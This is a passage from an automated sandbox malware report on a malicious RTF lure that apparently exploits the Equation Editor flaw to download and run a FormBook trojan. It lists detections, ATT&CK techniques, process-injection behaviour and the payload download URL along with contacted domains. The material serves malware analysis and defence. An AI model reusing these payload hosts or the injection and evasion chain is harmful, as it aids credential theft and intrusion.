          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B00A3 cpuid
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading          		LSASS Memory251
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth14
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts23
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer123
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync125
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 635413 Sample: Revised RFQ-PO180911.doc Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 63 Initial sample is an obfuscated RTF file 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 23 2->16         started        process3 dnsIp4 45 sanbarts.com 194.9.94.86, 49173, 80 LOOPIASE Sweden 11->45 47 215ffbc1941f6023.7host.cn 45.120.185.113, 49174, 80 HENGDA-HKHENGDANETWORKLIMITEDHK Hong Kong 11->47 49 www.sanbarts.com 11->49 39 C:\Users\user\AppData\Roaming\word.exe, PE32 11->39 dropped 41 C:\Users\user\AppData\Local\...\cssati[1].exe, PE32 11->41 dropped 89 Office equation editor establishes network connection 11->89 91 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->91 18 word.exe 19 11->18         started        43 ~WRF{E6E86BED-0A8E...F-02AF74FFE8F6}.tmp, Composite 16->43 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\Local\...\dvukljmnr.exe, PE32 18->37 dropped 71 Multi AV Scanner detection for dropped file 18->71 22 dvukljmnr.exe 18->22         started        signatures9 process10 signatures11 73 Multi AV Scanner detection for dropped file 22->73 75 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->75 77 Tries to detect virtualization through RDTSC time measurements 22->77 79 Injects a PE file into a foreign processes 22->79 25 dvukljmnr.exe 22->25         started        process12 signatures13 81 Modifies the context of a thread in another process (thread injection) 25->81 83 Maps a DLL or memory area into another process 25->83 85 Sample uses process hollowing technique 25->85 87 Queues an APC in another process (thread injection) 25->87 28 explorer.exe 25->28 injected process14 dnsIp15 51 sbsfe-p8.geo.mf0.yahoodns.net 98.137.244.37, 49175, 80 YAHOO-GQ1US United States 28->51 53 www.storyofsol.com 28->53 55 2 other IPs or domains 28->55 93 System process connects to network (likely due to code injection or exploit) 28->93 32 wuapp.exe 28->32         started        signatures16 process17 signatures18 57 Modifies the context of a thread in another process (thread injection) 32->57 59 Maps a DLL or memory area into another process 32->59 61 Tries to detect virtualization through RDTSC time measurements 32->61 35 cmd.exe 32->35         started        process19

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Revised RFQ-PO180911.doc32%VirustotalBrowse
          Revised RFQ-PO180911.doc32%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp100%AviraEXP/CVE-2018-0798.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe9%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe62%ReversingLabsWin32.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\dvukljmnr.exe69%ReversingLabsWin32.Trojan.GenericML
          C:\Users\user\AppData\Roaming\word.exe9%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\word.exe62%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.0.dvukljmnr.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.dvukljmnr.exe.160000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.dvukljmnr.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.dvukljmnr.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.dvukljmnr.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.sanbarts.com/YR$0%Avira URL Cloudsafe
          http://sanbarts.com/cssati.exe100%Avira URL Cloudmalware
          www.rthearts.com/nk6l/0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.sanbarts.com/cssati.exeC:0%Avira URL Cloudsafe
          http://sanbarts.com/330%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://www.sanbarts.com/Couri0%Avira URL Cloudsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.sanbarts.com/cssati.exekkC:0%Avira URL Cloudsafe
          http://www.sanbarts.com/cssati.exe100%Avira URL Cloudmalware
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://sanbarts.com/cssati.exej0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          215ffbc1941f6023.7host.cn
          		45.120.185.113
          		truetrue
            		unknown
            sanbarts.com
            		194.9.94.86
            		truetrue
              		unknown
              sbsfe-p8.geo.mf0.yahoodns.net
              		98.137.244.37
              		truetrue
                		unknown
                www.sanbarts.com
                		unknown
                		unknowntrue
                  		unknown
                  www.paypal-caseid521.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.storyofsol.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.createacarepack.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://sanbarts.com/cssati.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        www.rthearts.com/nk6l/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.sanbarts.com/cssati.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHitrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://www.sanbarts.com/YR$EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sanbarts.com/cssati.exeC:EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://sanbarts.com/33EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.piriform.com/ccleanerqexplorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    http://www.sanbarts.com/CouriEQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://treyresearch.netexplorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sanbarts.com/cssati.exekkC:EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://java.sun.comexplorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://investor.msn.com/explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.%s.comPAexplorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		low
